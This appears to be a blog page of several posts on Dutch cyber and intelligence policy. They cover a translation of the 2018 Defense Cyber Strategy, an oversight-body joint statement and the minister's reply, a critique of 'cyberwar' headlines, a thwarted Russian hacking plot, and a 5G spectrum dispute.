On 12 November 2018, the Dutch minister of defense released (in Dutch) the MoD’s Defense Cyber Strategy 2018. The initial strategy was released in 2012 and revised in 2015. The new strategy document (.pdf, in Dutch; mirror) is available only in Dutch, as were previous ones. In the post you’re reading now I provide a single-page, unofficial translation of the entire text (~3500 words). A single-page plain text version in Dutch is available here.

Some takeaways (do read the entire text; these takeaways are not a summary):

• The MoD wants to (publicly) confront perpetrators of cyber attacks with their behavior more often — an example of this was the public outing of a Russian cyber operation on 4 October 2018 — because a state actor “who is (publicly) held accountable for his actions will make a different [risk] assessment than an attacker who can operate in complete anonymity.”
• The MoD will invest (more) in offensive capabilities, among others for the purpose of attribution (see previous bullet).
  • Related read: NATO To ‘Integrate’ Offensive Cyber By Members (Sydney J. Freedberg Jr., Breaking Defense, 16 November 2018).
• The MoD is conducting a study into the design, formation and organization of a Cyber ​​Innovation Hub to be set up in 2019, in which government departments, research institutes and companies work together on joint and prioritized security issues in the field of cyber security.
• As of 2019, the MoD will invest ±6.5 million euros per year in cyber research. This is an increase from the 4 million euros invested in previous years.

Google Translate was used for initial translation of the bulk text, which I then compared line-by-line to the original Dutch text. I corrected translation weirdness and errors (of which there were quite a lot; a reminder that automated translation should not be fully relied upon when details matter), added a few horizontal lines as separators for clarity of exposition / readability, made minor modifications to make the text intelligible to non-Dutch readers, added hyperlinks for easy referencing, and added minor explanation and/or links within [square brackets]. Feel free to contact me with questions or corrections.

I’m committed to the motto “cool URIs don’t change“, so the link you’re currently visiting can be considered a permalink, suitable for use as reference in bibliography if needed/desired.

Dutch MoD Defense Cyber Strategy 2018: “Investing in digital military capability”

---

Table of Contents

Introduction

Chapter I: The MoD’s contribution to digital security of the Netherlands and NATO

Chapter II: Winning digitally in military operations

Chapter III: Prerequisites: personnel, knowledge development and innovation, cryptography

---

Introduction

Our country must be able to rely on the ministry of defense when needed. Acting against serious digital threats to our security, both nationally and internationally, is part of this.

With the deterioration of international security and the tightening of geopolitical conflicts of interest, the MoD’s contribution to our digital security has become even more important. The Cyber ​​Security Assessment Netherlands (CSAN) 2018 shows that the biggest digital threat to our national security comes from nation states. This has consequences for what is expected from the MoD. Moreover, our increasingly digitized country must be prepared for advanced digital threats in the event of an unforeseen military conflict. The MoD has to take responsibility, both at national level and in NATO.

The present Defense Cyber ​​Strategy is established within the framework of the Defense Memorandum, the Integrated Foreign and Security Strategy (GBVS) and the National Cyber ​​Security Agenda (NCSA), and contributes to the implementation of these strategies. It builds on the foundation provided by the first Defense Cyber ​​Strategy in 2012, which initiated the establishment of the Defense Cyber ​​Command (DCC) [read more] and the Joint Sigint Cyber ​​Unit (JSCU) [read more] of the General Intelligence and Security Service (AIVD) and the Military Intelligence and Security Service (MIVD), and the strengthening of the Defense Computer Emergency Response Team (DefCERT) and Royal Netherlands Marechaussee. Many steps have been taken since 2012. It is now time to accelerate and connect.

The expanded financial budget established in the coalition agreement, rising to 20 million euros annually per 2021, enables this.

On the basis of this strategy, the MoD invests in cyber capabilities to:

• Be in charge of its own IT and weapon systems at all times and to ensure its digital resilience. This will remain an important point of attention in the coming years.
• Even better to know who is threatening our national security in the digital domain. The MIVD plays an indispensable role together with the AIVD.
• Have more possibilities to disrupt or deter digital attacks.
• Cooperate with civil partners to ensure the safety of the Netherlands and of our vital infrastructure, and to ensure continuity of vital processes in the event of an unexpected military conflict involving the use of digital attacks.
• Deploy digital means in a targeted manner to obtain and retain dominance during military operations.

The achievement of digital power for the Netherlands is an ambitious goal. But it is a necessary ambition, given the core tasks of the MoD in protecting its own territory and NATO territory, promoting international legal order, and supporting civil authorities.

---

Chapter I: Defense’s contribution to the digital security of the Netherlands and NATO

State actors and criminal groups are becoming less and less reticent in the digital domain. Cyber ​​attacks and incidents occur on a daily basis. They can no longer be regarded as isolated. Increasingly, interrelated incidents occur, which together form a campaign of state actors and their proxies, intended to undermine our economy, vital infrastructure, military capabilities, and the democratic order of countries. It should also be taken into account that certain states are targeting industrial control systems in vital sectors in preparation for a possible military conflict. These are activities or operations aimed at creating the conditions for a military operation (shaping the battlefield). The MoD has a responsibility to act on this, in close consultation with civil partners. What is clear, however, is that if an (imminent) cyber attack takes place on such a scale that it can be seen as an (imminent) armed attack, every state has the right to defend itself under international common law and Article 51 of the UN Charter.

Proper defense and security are not enough to keep malicious persons from digital attacks. More and more allies are taking a more active stance in the digital domain (active defense). In the context of both the first and third core tasks of the MoD, a more active defense contribution is necessary within existing structures. To reinforce this, the MoD will invest in the following capacities and concepts during the coming years:

1. Information: capacity to act and attribution
2. Contribute to deterrence by military assets in the digital domain
3. Digital resilience and protection of own networks and systems
4. Research into national fallback options
5. Military assistance and support to civilian authorities
6. Law enforcement (Royal Netherlands Marechaussee)

1 Information

Capabilities

The vast majority of digital attacks can be thwarted by the IT or CERT organization of the affected party. To counter the covert, persistent digital attacks by state actors (Advanced Persistent Threats, APTs), however, (counter-) intelligence research is also required. This research provides unique information with which effective defensive measures can be taken. The MIVD makes information about digital threats available to relevant actors inside and outside the MoD who can take measures based on this, such as DefCERT, the Public Prosecution Service, the National Cyber ​​Security Center (NCSC), and companies. To detect digital espionage or sabotage, technical characteristics acquired by the MIVD and AIVD about cyber attacks can be used in the National Detection Network (NDN). The NDN is a partnership that aims to detect digital threats against vital sectors and the national government better and faster, so that damage can be prevented or limited. The contribution of the MIVD to the NDN will be expanded. New defense tools will be used to develop an active defense against digital attacks. In addition, the number of sensors is being expanded to enable digital attacks to be detected better and faster and to investigate and respond effectively to the threats. In addition to participating in the NDN, the MIVD, as announced in the NCSA, will also participate in the cooperation platform involving NCSC, AIVD and police to quickly share relevant (technical) information about cyber threats at a joint location. In addition, information forms the basis of military capability in the cyber domain. Offensive cyber capabilities build on the intelligence/information position. On the basis of intelligence from the MIVD, the Defense Cyber ​​Command can design military capabilities. Finally, within the framework of the Intelligence and Security Services (ISS) Act [in Dutch: ‘Wiv2017’], the MIVD can also act itself on the basis of intelligence to disrupt acute threats in the digital domain.

Attribution

The increasing cyber threat requires a strong, international response based on international agreements. The status quo is still insufficient. The cabinet wants to (publicly) confront perpetrators of cyber attacks with their behavior more often. This requires detection, and then political, and possibly legal, attribution. Determining who is the actor behind a cyber operation (technical attribution) is therefore an indispensable and complex aspect that requires intensive research. By means of high-quality and knowledge-intensive intelligence research, the MIVD, in collaboration with partners such as the AIVD and the police, tries to discover the actor behind a cyber attack and the actor’s intentions, so that the cabinet can proceed to political attribution and take targeted countermeasures. An active political attribution policy contributes to deterrence and making the Netherlands less attractive as a target of cyber attacks. A state actor who is (publicly) held accountable for his actions will make a different assessment than an attacker who can operate in complete anonymity. The Netherlands thereby contributes to combating impunity in the digital domain.

2. Contribute to deterrence by military assets in the digital domain

Deterrence means that an opponent refrains from (repeating) an attack because he is convinced that costs do not outweigh benefits. Deterrence is not domain-bound, in other words: attacks from another domain can be deterred with cyber resources, and conversely, deterrence of cyber attacks can come from other domains. The operational capacities of the Defense Cyber ​​Command contribute to the total arsenal of deterrence means available to the government. Deterrence makes the Netherlands a less attractive target for (cyber) attacks and is above all a means for conflict prevention. In addition to the ability to attribute attacks, deterrence requires credible offensive capabilities. Through integration in (ongoing) missions and operations, the MoD will work on the visibility and credibility of its digital military capabilities.

NATO is the cornerstone of Dutch security policy for the government. The Netherlands has made a strong case with other allies for the alliance of cyberspace as a military domain. The alliance recognized this at the Warsaw Summit in 2016. Since then, a lot of work has been done to operationalize the digital domain, for example by designing a mechanism for integrating cyber capabilities into NATO missions and operations. This will contribute to the collective task of defense and deterrence. Therefore, at the NATO summit in Brussels in July 2018, the Netherlands declared its willingness to contribute with cyber capacities to allied missions and operations.

3. Digital resilience and protection of own networks and systems

In order to be able to contribute to the digital security of the Netherlands and to guarantee the safe and effective deployment of the Dutch armed forces, it is necessary that the MoD’s own digital resilience adapts to threats. Deployment of the armed forces is therefore regarded as a vital process within the framework of vital infrastructure. The IT systems of the MoD are fully intertwined with business operations, command systems, and sensor and weapon systems. The MoD is dependent on these IT systems and the information available on them. Cyber ​​attacks against IT, sensor, weapon and command systems can undermine deployability and effectiveness of the armed forces. A high level of security awareness and effective protection of systems and networks therefore require sustained effort. Preventive measures form the necessary basis for digital resilience, the combination of awareness, prevention, detection and capacity to act. In order to protect MoD systems, these measures must be implemented across the entire IT chain, from software development to network protection. This also places high demands on the personnel working on the design, security, use and maintenance of IT systems. The knowledge of the staff must be up-to-date, and the staff must have access to the latest techniques.

All defense departments involved must make every effort to protect the MoD from cyber threats. The defensive cyber chain consists of several layers, spread over the entire defense organization. Cyber ​​governance and policy provide direction, focus and frameworks for the efforts in the cyber domain. Security by design means that implementation of security measures is already taken care of when designing IT systems. Security assessments analyze and assess systems for residual risks and compliance and supervision take place on compliance with policies and regulations. Security and surveillance focuses in particular on connections between the MoD and external networks. Incident response ensures mitigation of cyber incidents.

4. Research into national fallback options

It will be investigated which MoD facilities in collaboration with which parties can be used to keep critical processes running when there is a societal disruption of ICT as a result of a digital attack. Facilities such as the physically separated and secured fiber MoD network (the Netherlands Armed Forces Integrated Network, NAFIN) can play a role in this.

5. Military assistance and support to the civil authorities

To contribute to national security, the MoD will strengthen the implementation of the third core task in the digital domain by making a greater contribution to existing civil structures. In view of the nature of the threats, the MoD is focusing in particular on vital infrastructure through more intensive cooperation with the responsible security partners, in particular the NCSC. Supply and demand of cyber capabilities of the MoD are identified in consultation with civil authorities and public and private partners. By being involved in sector-specific developments and threats at an early stage, the MoD will be able to switch to providing assistance and support more effectively if necessary. To achieve this, the MoD wants to make a larger and more tangible contribution to existing civil structures in the field of information sharing and response.

Information sharing

Information Sharing and Analysis Centers (ISACs) [more here; in Dutch] have been set up to create a familiar environment in which organizations from the same sector can share tactical information about (sector-specific) cyber threats, incidents, experiences and mitigating measures, with the aim of strengthening digital resilience. Participants in an ISAC have a pivotal role within their own organization in the field of information security, ICT security, and policy. The NCSC, the AIVD, and the police are connected to most ISACs. The Royal Netherlands Marechaussee is a permanent partner in the Airport ISAC. The permanent network that an ISAC entails and the information that is exchanged is an important added value for all participants. Due to their nature and composition, ISACs offer an ideal platform for gaining more knowledge about sector-specific cyber threats and opportunities of the MoD to contribute to mitigating measures if necessary. The MoD, in consultation with the NCSC and members of the ISACs, will explore whether the MoD’s involvement in the ISACs can be intensified.

Response

The National Response Network (NRN) is a network of CERT organizations, coordinated by the NCSC, with the aim of strengthening technical responses to cyber security incidents. This is done by exchanging knowledge, experience and personnel. This way, cohesion is organized and existing capacities are strengthened. In addition to the NCSC, the current NRN partners include DefCERT, Tax Authorities, Rijkswaterstaat, SURF, and the Information Security Service of municipalities. The MoD will actively contribute to the NRN and strive for expansion of the network. The MoD will also commit to use the NRN as a platform for exercises with vital sectors and the NCSC. Joint exercises ensure that organizations become familiar with each other’s procedures, interests and working methods and can therefore collaborate more effectively if a calamity actually occurs.

6. Law enforcement (Royal Netherlands Marechaussee)

The MoD has a management responsibility in the execution of the police tasks of the Royal Netherlands Marechaussee. The Royal Netherlands Marechaussee must also be equipped in face of increasing cyber threats. In particular the digitization of border processes and increasing digital identity fraud generate risks. Risks that must be controlled by both a better defense and investigation. For the implementation of this, the Royal Netherlands Marechaussee will enter into partnerships with, among others, the police and FIOD.

---

Chapter II: Digital winning in military operations

Article 97 of the Constitution for the Kingdom of the Netherlands that a Dutch armed force exists, including for “the purpose of maintaining and promoting the international legal order.” The reference in this article to the international legal order is closely linked to Article 90, which states that the government will promote international rule of law. Partly because of increased instability in countries on the edges of Europe, this second core task will also require a lot from the MoD in the coming years. Due to the undermining of the international legal order, the open and free international (trade) flows are also at stake. Safeguarding supply routes on land, at sea, in the air and in the digital domain is an interest of the international community to which the government is committed. The Netherlands is committed to promoting the international legal order, conflict prevention and stabilization.

The Netherlands also contributes to this by taking an integrated approach to military missions and operations in an alliance.

The digital domain will play an important role in every future conflict and the government determines that for the effective execution of the second main task of the armed forces in the digital domain, further development of cyber capacities is necessary. In order to create more dominance in the digital domain when deploying the armed forces for the promotion of the international legal order, Defense will further invest in the following capacities and concepts in the coming years.

1. Creation of composite cyber mission teams

As part of the military capability, cyber capabilities can contribute to military missions and operations. To enable military action in the digital domain, in-depth knowledge must be available at an early stage about vulnerabilities within systems of potential opponents. Based on its statutory tasks, the MIVD supports the DCC with information that is necessary for an effective military deployment in the digital domain. Because intelligence and military operations in the digital domain require similar knowledge and skills, cyber mission teams, consisting of both MIVD personnel and staff of the armed forces, are formed on an international basis. The designated employees operate within the framework of the ISS (in Dutch: Wiv2017) and are placed under the command of the Commander of the Armed Forces within the relevant mandate when deploying the armed forces. If necessary, components from DefCERT and the operational commands will also be added to these teams. In order to be able to test military deployment in the cyber domain for legitimacy, the Royal Netherlands Marechaussee is investing in knowledge-building in this area.

2. Cyber ​​capacities as a fixed component in military planning

The digital aspect is taken into consideration at an early stage of the planning phase of each (potential) mission. This is expressed in (military) advice and analysis by the Operations Directorate and subsequent (operation) planning. When the armed forces are actually deployed to maintain and promote the international legal order, Article 100 of the Dutch constitution applies to the provision of information to the Dutch States General. Article 100 states that the government is obliged to inform the States General in advance of “the deployment or the provision of the armed forces for the maintenance or promotion of the international legal order.” ‘Article 100 letters’ will from now on include a cyber paragraph when relevant to a mission. This paragraph lays down, within the limits of what can be shared publicly, what contribution military cyber capabilities make to the mission or operation in question. In this way, the MoD is promoting awareness, inside and outside its own organization, of the increasing importance of the digital domain as a fully-fledged domain of military action.

---

Chapter III: Conditions: personnel, knowledge development and innovation and cryptography

The present strategy outlined the developments and priorities that should lead to the MoD being able to effectively implement its three main tasks in the digital domain. This will not be possible without giving substance to the conditions that apply to all these measures: personnel, knowledge development and innovation, and cryptography.

Personnel

To be successful in the digital domain, in-depth knowledge of the domain is indispensable. Cyber ​​and IT professionals have the necessary knowledge and experience. Because of the scarcity of specialists on the labor market, it is not evident that the MoD will always have access to that knowledge. In the coming period, the MoD will investigate possible solutions to improve recruitment and retention of cyber professionals, both military and civilian. Attention is paid to connecting cyber and IT professionals. By establishing career paths, improved insight into the entire human cyber potential can be created and directed more focused on recruitment, retention and career. Also, the use of exchange facilities inside and outside (including market parties) the MoD ensures that the knowledge of cyber professionals remains current, employees are more satisfied and the network of cyber professionals is strengthened.

To offer cyber and IT professionals opportunities for development within the domain, functions will be categorized. In order to prevent competition within the government and promote interoperability, the MoD is committed to uniform job descriptions and equivalent valuations for cyber and IT professionals.

Knowledge development and innovation

Knowledge development and innovation in the field of cybersecurity is necessary to stay ahead of opponents and to cope with new digital threats. Moreover, a high-quality, autonomous knowledge position makes Defense less dependent on cybersecurity expertise and solutions from others. In the NCSA, knowledge development is therefore also mentioned as one of the seven main ambitions in the area of ​​cyber security for the coming years. This concerns both fundamental and applied cybersecurity research. This means multidisciplinary research in the entire knowledge chain that looks at solutions for both the longer and the shorter term. Therefore, in 2018 Defense has also become a member of the Dutch Cyber ​​Security Platform for Higher Education and Research (Dcypher). This platform provides, among other things, for the agenda and coordination of cybersecurity research and higher education.

The recently published third edition of the National Cyber ​​Security Research Agenda (NCSRA) [.pdf] is an important framework for cybersecurity knowledge development in the Netherlands. The MoD has actively contributed to the creation of this agenda. As of 2019, the MoD will expand available means for research in the field of cyber. The MoD will invest almost 6.5 million euros per year in cyber research from 2019 onwards, which is an increase from the 4 million euros in previous years. Where possible, this is done together with other departments, as also announced in the Dutch Digitization Strategy.

Together with a number of other parties, the MoD is conducting a study into the design, formation and organization of a Cyber ​​Innovation Hub to be set up in 2019, in which government departments, research institutes and companies work together on joint and prioritized security issues in the field of cyber security. The aim of the Cyber ​​Innovation Hub is to strengthen cyber knowledge and expertise in the Netherlands, to facilitate innovations and experiments.

EOF

UPDATE 2019-03-19: the Dutch minister of the Interior has responded (in Dutch) to the joint statement, as per request of the Dutch oversight committee (CTIVD). I added a translation of that response to the post below.

The intelligence oversight bodies in five European countries today announced a “new form of cooperation” via a joint statement (.pdf; mirror) that was signed in Bern (CH) by the five heads of national oversight on 22 October 2018. The participants are:

• 🇧🇪 Belgium: Belgian Standing Intelligence Agencies Review Committee
  • Locally known as `Comité permanent de contrôle des services de renseignements et de sécurité’ (French) and `Vast Comité van Toezicht op de inlichtingen- en veiligheidsdiensten’ (Dutch)
  • Website: http://www.comiteri.be/
• 🇩🇰 Denmark: Danish Intelligence Oversight Board
  • Locally known as `Tilsynet med Efterretningstjenesterne’
  • Website: http://www.tet.dk/
• 🇳🇱 Netherlands: Review Committee on the Intelligence and Security Services
  • Locally known as `Commissie van Toezicht op de Inlichtingen- en Veiligheidsdiensten’ (CTIVD)
  • Website: https://www.ctivd.nl/
• 🇳🇴 Norway: EOS Committee – The Norwegian Parliamentary Intelligence Oversight Committee
  • Locally known as `EOS-utvalget’
  • Website: https://eos-utvalget.no/
• 🇨🇭 Switzerland: Independent Oversight Authority for Intelligence Activities (OA-IA)
  • Locally known as `Unabhängige Aufsichtsbehörde über die nachrichtendienstlichen Tätigkeiten’ (AB-ND)
  • Website: https://www.ab-nd.admin.ch/

According to the statement, it:

• Describes their project, “which entailed each of them conducting an investigation into their respective countries’ services’ use of information regarding foreign terrorist fighters and sharing our methods, best practices and experiences.”
• Addresses the challenges they met “when overseeing international data exchange, including the risk of an oversight gap when intelligence and security services cooperate internationally.”
• Identifies ways to “move forward towards strengthening oversight cooperation, for example through minimizing secrecy between oversight bodies so that certain information can be shared, in order to improve our oversight of international data exchange.”

The challenges to international oversight that are mentioned (and explained) in the statement:

• “Oversight does not cross national borders”: oversight is limited to national mandates, hence does not have a framework that provides possibilities for international cooperation / matching / comparison / benchmarking.
• “The challenge of cooperation in the face of secrecy”: speaks for itself.
• “Assessment of necessity and proportionality”: this can vary depending on, for instance, how different countries interpret and evaluate these; which can include difference is use of margins of appreciation that nation states have under international law with regard to the concept of national security.
• “Some countries differentiate between citizens and foreigners”: speaks for itself.
• “Means and methods of data exchange”: informal vs formal, and differences in how exchange takes place in practice.

The most important parts (IMHO, are these paragraphs from the section “5. Oversight of international data exchange – moving forward” (bold emphasis is mine):

“[…]

Due to technological development and increased cooperation, the data exchange between intelligence and security services is intensifying, resulting in an increase of the number of individual data exchanges. The sheer volume of data exchanged may become a challenge in itself. To assess the legitimacy and quality of each individual exchange can become an overwhelming task for the oversight bodies. In addition to conducting spot checks, it is becoming increasingly important to assess the system and framework for data exchange and the existence and functioning of safeguards for the protection of fundamental rights.

To do this effectively, oversight bodies will need to develop new methods. One way forward may be to increasingly use computerized automation and tools developed for conducting oversight of large volumes of data. In order to achieve this, oversight bodies need to expand their IT expertise and knowledge of the services’ systems. Another way to facilitate a more effective oversight would be to take the needs of the oversight bodies into account when the services implement new systems and to strengthen mechanisms of internal and external control.

The oversight bodies of Belgium, Denmark, the Netherlands, Norway and Switzerland will continue to exchange methods and best practices, as well as discuss international challenges to oversight, and the best approaches to overcoming these challenges. We invite oversight bodies from other countries to join us in our efforts to limit the risk of an oversight gap and to improve oversight of international data exchange between intelligence and security services.“

UPDATE 2019-03-19: the Dutch minister of the Interior has responded (in Dutch) to the joint statement, as per request of the Dutch oversight committee (CTIVD). My unoffficial translation of the body of her letter:

“[…]

Core statement

In the joint statement, the oversight bodies point out that cooperation between intelligence and security agencies, both bilateral and multilateral, has intensified over recent years. After all, the international character of the terrorist threat necessitates such cooperation. The oversight bodies speak of a risk of a gap in oversight, because the oversight is strictly national and — different from the intelligence cooperation — ends at the country border. The oversight bodies state that national legislation can impede the exercise of effective oversight regarding developments in such cooperation. The five oversight bodies therefore initiated a project in which they shared experiences and methods, without sharing classified information between them.

A necessary step to effectuate the cooperation of the oversight bodies should, according to the oversight bodies, be that national oversight bodies are permitted to communicate about classified topics. The oversight bodies note that once intelligence and security services have exchanged classified information, there would be no reason for national oversight bodies to lag behind. That however requires that the Dutch law be amended, because the legal confidentiality obligation precludes such a course of action. Besides, in explaining its position, the CTIVD informed me that the intended information exchange should be limited in absolute terms and at least restricted to information that the oversight bodies already have access to in the course of their supervisory duties.

Considerations

I recognize the interest expressed by the oversight bodies, namely that the international exchange of information between intelligence and security services meets an adequate level of data protection, and that this can be monitored. I have drawn attention to this in various bilateral discussions with colleagues from abroad. I therefore welcome cooperation in this context between national oversight bodies. However, the amendment of the Intelligence and Security Services Act 2017 (Wiv2017), to make it possible to exchange classified information between oversight bodies, encounters objections.

The risk of an oversight gap, perceived by the CTIVD, is primarily related to the structure of national oversight by the various oversight bodies. There are significant differences between the supervisors. For example, the Dutch oversight system arranges that the CTIVD may also investigate the international cooperation of the services, which is not the case for every oversight body. It is not reasonable to amend the Wiv2017, because the amendment would only have an effect on the Dutch oversight body, and does not mandate a legal authority to foreign oversight bodies to exchange their state-secret information with the Dutch body. Furthermore, the exchange of classified information between oversight bodies has an impact on ministerial responsibilities. For the cooperation of the AIVD [aka GISS] or MIVD [aka DISS] with foreign services and the fact that classified data are shared with those services, the Minister of Defense and I are respectively [sic] fully responsible and can be held accountable by Parliament. Even if, for example, there is compromise of classified data. The Wiv2017 positions the CTIVD as an independent body, for which the Minister of Defense and I have only limited responsibility, namely only for the legal framework as such. This position is also endorsed by the CTIVD.

The foregoing does not change the fact that I share the interest pursued by the oversight bodies. I do, however, expect more relief if more attention is paid to the topic of oversight and if agreements are made within the framework of entering into bilateral or multilateral cooperation between intelligence and security services. I would like to dedicate myself to this.”

EOF

UPDATE 2018-11-12: politics… sigh. The minister was interviewed by journalist Eelco Bosch van Rosenthal (Twitter: @eelcobvr) during tonight’s Nieuwsuur tv broadcast. The interview was in Dutch – here follows my translation of the initial part of the interview, which essentially renders my original post obsolete. Bosch van Rosenthal: “First, let’s get semantics out of the way. Last month you sort of confirmed that the Netherlands is in a cyberwar; you later backtracked a bit on that. Is it a cyberwar?” Minister Bijleveld: “Well, I did not distance myself from it […]. You can debate about whether or not to use the word ‘war’ […]. Attacks are being aimed at us and [those are] a form of war; you can describe it as such”. (I shall refrain from commenting about reasons for upholding a statement that was never really made to begin with; other than noting that it of course remains true that there is no ‘war’ in a legal/formal sense.)

(Note wrt this post: I recommend anyone who understands Dutch to actual watch + listen to today’s WNL Op Zondag show — and try to forget the pretext/frame already imposed on your brain by the news headlines while doing so; i.e., watch/listen as if you’ve never read anything about it. And either then form an opinion about the headlines; or remain undecided for the time being.)

News headlines today in the Netherlands and subsequently in international media suggest that Dutch minister of defense Ank Bijleveld has said that the Netherlands is at “cyberwar” with Russia. These reports are misleading and misrepresent reality.

On Sunday 14 October 2018, during an interview in the right-leaning Dutch tv show “WNL Op Zondag”, journalist Yoeri Albrecht brought forward the words “propaganda war” and “cyber war”; this was in the context of the disruption of a Russian cyber operation as revealed on 4 Oct 2018 — which is about intelligence & espionage, not about war (semantics matter).

The host, journalist Rick Nieman, then asked the minister: “a ‘cyberwar’, as mentioned by Yoeri by the way, is that a good description?”. The minister somewhat loosely confirmed that, without much deliberation, in a way that to me clearly was only meant to be conducive to a conversation (in an informal setting); not to confirm that we are “at war”. Yet, Omroep WNL published a piece that cherry-picked & overemphasized that side-step detail, ignoring the aforementioned details, through the following headline:

• Omroep WNL: “Defense minister Bijleveld: ‘Netherlands is at cyberwar with Russia'”

Subsequently, reports started appearing from other Dutch media:

• NOS: “Minister Bijleveld bevestigt: we zijn in cyberoorlog met de Russen” (link)
• NU.nl: “Minister Bijleveld: ‘Nederland in cyberoorlog met Rusland'” (link)
  • Note: the NU.nl even states ‘Minister Bijleveld spreekt van een “cyberoorlog” in het televisieprogramma WNL op Zondag’, which is hard to interpret other than as suggesting that Bijleveld herself mentioned the word “cyberoorlog” (English: “cyberwar”). She never mentioned that word a single time.
• AD.nl: “Bijleveld: Nederland in cyberoorlog met Russen” (link)
• (many more)

And reports then started to appear in international media, for instance:

• Guardian: “Netherlands in a ‘cyberwar’ with Russia, says defence minister” (link)

…including RT (formerly known as Russia Today) & Sputnik Int’l:

• RT: “Netherlands in cyberwar with Russia? Dutch defense minister says ‘YES’” (link)
• Sputnik Int’l: “Netherlands in ‘Cyberwar’ With Russia – Defense Minister” (link)

The minister’s response, especially in its context and given the precise words & intonation etc., in no way warrants headlines of the likes seen here. Also, note that the minister herself did not mention the word “cyber war” a single time during the entire show. The minister could, and perhaps should, have objected to the word “war” — which, let me repeat it once more, was brought forward by others — but didn’t at that time. But neither the lack of explicit refutation nor (even) the confirmation, taking the context into account, warrant such headlines.

I hold the Dutch ‘fourth estate’ in high regard. But in my opinion, the Dutch journalists/editors who chose to spin the WNL conversation into dubious headlines failed us as a society today (a little bit); perhaps in an instance of ‘medialogica‘. While Dutch journalists are not responsible for what e.g. RT & Sputnik do, they do have a moral responsibility to be accurate in reporting, especially regarding these matters, taking into account geopolitical developments. That responsibility includes anticipating potential re-use / abuse of news in support of ongoing information operations — by which I’m not implying they should not report something, but by which I am claiming that due diligence is necessary when reporting about these sensitive topics.

Failing to take such responsibility means accepting the risk that one becomes a useful idiot to others — which I also stated in a tweet (it’s a bit offensive, but for good reason). Today’s headlines were misleading and unnecessarily provided informational cannon fodder for ongoing information operations that may also be aimed against the Netherlands.

EOF

UPDATE 2018-09-18: the Dutch and Swiss envoys to Russia have been summoned by the Russian ministry of Foreign Affairs yesterday, according to NRC Handelsblad. Also, reportedly, the Swiss & Russian minister of foreign affairs will meet next week in New York “on the sidelines of the United Nations General Assembly.”

According to reports by Dutch news paper NRC Handelsblad and Swiss news paper Tages-Anzeiger published on 13 September 2018, western intelligence agencies thwarted a plot involving two Russians intending to compromise the computer network of a Swiss government laboratory — the Spiez Laboratory, which carries out investigations related to nuclear, biological and chemical weapons and defense (CBRN).

The two were apprehended in The Hague (NL) in early 2018 and allegedly carried (unspecified) equipment with them that can be used to compromise computer networks. They are believed to work for GRU, Russia’s foremost foreign intelligence agency. The apprehension was the result of cooperation between various European intelligence services, reportedly including the Dutch Military Intelligence & Security Organization (MIVD).

The Spiez laboratory has been commissioned by the Organization for the Prohibition of Chemical Weapons (OPCW) to carry out investigations related to the poisoning of Russian double agent Skripal and the use of chemical weapons by the Russian-support Assad regime.

Switzerland’s federal intelligence agency NDB confirmed knowledge about the discovery and expulsion of the two. NDB states that it has “cooperated actively with Dutch and British partners” and has thereby “contributed to preventing illegal actions against a sensitive Swiss infrastructure”.

NRC Handelsblad states that according to the public prosecutor in Bern (CH), the two Russians have been subject of a criminal investigation since March 2017 on suspicions of compromising a computer system of anti-doping agency WADA. In September 2016, WADA stated that Russian espionage operator group Tsar Team (aka Fancy Bear aka APT-28) had compromised its Anti-Doping Administration and Management System (ADAMS) database via “an International Olympic Committee (IOC)-created account for the Rio 2016 Games”; specifically via the account of Yuliya Stepanova, who WADA qualifies as “key whistleblower” for the WADA commission that exposed widespread doping in Russian athletics. (Note: if WADA’s attribution of that attack to the Tsar Team is accurate, it is possible that the two caught in The Hague are operators of the Tsar Team.)

The Spiez laboratory had already been a target of hacking attempts earlier this year, according to a spokesperson of the laboratory. “We defended ourselves against that. No data was lost”, the spokesperson stated to NRC Handelsblad and Tages-Anzeiger.

On 14 April 2018, Russian foreign minister Sergei Lavrov stated he had obtained the confidential Spiez lab report about the Skripal case “from a confidential source”. That report confirmed earlier findings made by a British laboratory. The OPCW states that its protocols do not involve dissemination of lab reports to OPCW member states. It remains unknown how Lavrov got hold of it.

In the aftermath of the Salisbury incident, the Dutch government expelled two employees of the Russian embassy in The Hague. In a letter (.pdf) sent to the Dutch parliament on 26 March 2018 — the day on which a large number of countries announced bilateral measures against Russia —, the ministers of foreign & internal affairs stated that they decided to expel the two “in close consultation with allies and partners”. The Russians were ordered to leave the Netherlands within two weeks. It is unknown whether the two expelled Russians are those who were apprehended in The Hague.

In a November 2017 parliamentary letter from Dutch minister of internal affairs Ollongren, the minister stated that Russian intelligence officers are “structurally present” in the Netherlands in various sectors of society to covertly collect intelligence. She stated that Russia in addition to classical (human) intelligence methods also deploys digital means to influence decision-making processes and public opinion.

UPDATE 2021-01-08: report from November 2019 by TNO (.pdf): Co-existence of 5G mobile networks with Burum Satellite Access Station operating in C-band.

UPDATE 2018-12-19: the Dutch government has reportedly (NOS, in Dutch) decided to move the sigint collection facility in Burum (NL) to another country (!), something that chief of military intelligence Onno Eichelsheim expressed (NRC Handelsblad, in Dutch) concerns over in an interview. It is unclear which country or countries have been considered. Obviously, if the Dutch want to uphold existing operations and ways of working, it must be a country that has laws that are compatible with the Dutch laws, notably a legal framework that includes bulk search & selection of communication (at least for ether communication, as the Burum facility focuses on satcom).

The Dutch policy debate on 5G spectrum is caught in deadlock: there are opposing legitimate interests of Dutch telecom providers and the Dutch Military Intelligence and Security Service (MIVD) in the 3.5GHz band. The House of Representatives discussed 5G on 29 March 2018. The 3.5GHz band, the most promising of the three standardized 5G bands (700MHz, 3.5GHz, and 26GHz), is also the band that in the northern half of the Netherlands — above the ‘Amsterdam-Zwolle’ line that cuts the Netherlands in half — is fully reserved for the MIVD’s satellite station in Burum, part of the National Sigint Organization (NSO; which is now part of the Joint Sigint Cyber Unit aka JSCU). In 2016 there was a similar situation when telecom operators sought to improve 4G connectivity using the 3.4GHz band (presumably too close to 3.5GHz).

Below follows an unofficial translation of an article printed in the 4 May 2018 issue of Technisch Weekblad.

Dutch policy debate on 5G spectrum is in deadlock

The deployment of a nation-wide 5G network in the Netherlands may end up being seriously delayed because the most important 5G band (3.5GHz) is reserved for the Dutch intelligence services until 2026. The AIVD and MIVD eavesdrop on ether communications via their satellites dishes in the Frisian place of Burum.

Telecom providers and other industry parties raised an alarm about this in the House of Representatives on 29 March 2018. Earlier, MP William Moorlag (Labour Party / PvdA) even argued that the MIVD antennas should be moved to drilling platforms at sea.

